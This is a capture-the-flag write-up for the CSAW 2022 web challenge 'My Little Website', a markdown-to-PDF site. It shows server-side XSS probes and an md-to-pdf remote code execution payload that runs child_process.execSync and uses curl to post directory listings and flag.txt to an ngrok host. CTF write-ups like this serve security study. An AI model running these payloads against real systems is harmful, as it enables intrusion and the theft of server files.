🚩
HACKBOOK OF A HACKER
  • README
  • CTF Writeups
    • Intigriti Challenges
      • 1223
    • ASIS CTF quals 2022
      • Beginner Ducks
    • CSAW 2022
      • Dockreleakage
      • My Little Website
      • Word Wide Web
    • Cybersecurityrumble CTF 2022
      • Crymeplx
      • Revmeplx
    • HTB University CTF 2023
      • Rev
        • Windowsofopportunity
    • Metared 2022
      • 1x02..ware
      • Backwards
    • Reply CTF 2022
      • Dungeons And Breakfast
    • Teamitaly CTF 2022
      • Flag Proxy
    • MOCA CTF 2024 Quals
      • RaaS [WEB]
  • Smart Contracts Security
    • Code 4 Rena
      • High Risk Findings
        • Anyone Can Pass Any Proposal
        • Arithmetic Rounding
        • Can Vote Multiple Times By Transferring NFT In Same Block As Proposal
        • Never Ending Proposal
        • Reusing Signatures
        • Signature Verification Can Be Bypass With Zero Address
        • Untyped Data Signing
        • Wrong Calculation Of Apr
      • Low Risk Non Critical
        • Dont Check If Some Entity Actually Exists
      • Medium Risk Findings
        • Bypass Signature Validity Check
        • Copy Of Lack Of Verification In Hashes
        • Function May Run Out Of Gas Leading To Loss
        • Incorrect Initialization Of Smart Contracts With Access Control Issue
        • Invalid Signature Lead To Access Control
        • Lack Of Checks If One Entity Get Hacked
        • Lack Of Verification In Hashes
        • Missing Upper Limit
        • Missing Zero Address Checks
        • Possible Dos Because Unbounded Loop Can Run Out Of Gas
        • Too Much Trust To Certain Roles
        • Unreversable Actions
        • Useless Nft
  • T.I.L.
    • 16 09 22
Powered by GitBook
On this page
  1. CTF Writeups
  2. CSAW 2022

My Little Website

WEB | 54 pts - 406 solves

PreviousDockreleakageNextWord Wide Web

Last updated 1 year ago

Description: I am new to programming and made this simple pdf creater website here, hopefully it is secure enough :)...

The challenge comes as a pdf rendering website, we can inject markdown or maybe...javascript. First thing, check for XSS:

<script> document.write(window.location) </script>

Ok, vulnerable, actually, it's Server-Side XSS, as we're not injecting code in the webpage (client-side), instead we executing code on the server-side of the application. Let's try something more interesting:

<script>document.write('<iframe src="/"></iframe>')</script>

We're inside /chal directory, node.js webapp, but index.js seems definitely something interesting for us, let's try to read it:

<script>
fetch('index.js')
  .then(response => response.text())
  .then(text => document.write(text))
</script>
---js
require('child_process').execSync('ls -la > /tmp/tmp.txt && curl -d @/tmp/tmp.txt http://06f6-151-62-28-161.eu.ngrok.io')
---

No flag here, let's try to look one directory above:

---js
require('child_process').execSync('ls -la .. > /tmp/tmp.txt && curl -d @/tmp/tmp.txt http://06f6-151-62-28-161.eu.ngrok.io')
---

Here we go, read flag.txt:

---js
require('child_process').execSync('curl -d @../flag.txt http://06f6-151-62-28-161.eu.ngrok.io')
---

CTF{pdf_c0nt1nu3s_70_5uCK}

That's a lot of info, but what's most important is the mdToPdf package, with a quick search we'll know that we can do RCE: .

https://security.snyk.io/vuln/SNYK-JS-MDTOPDF-1657880
http://web.chal.csaw.io:5013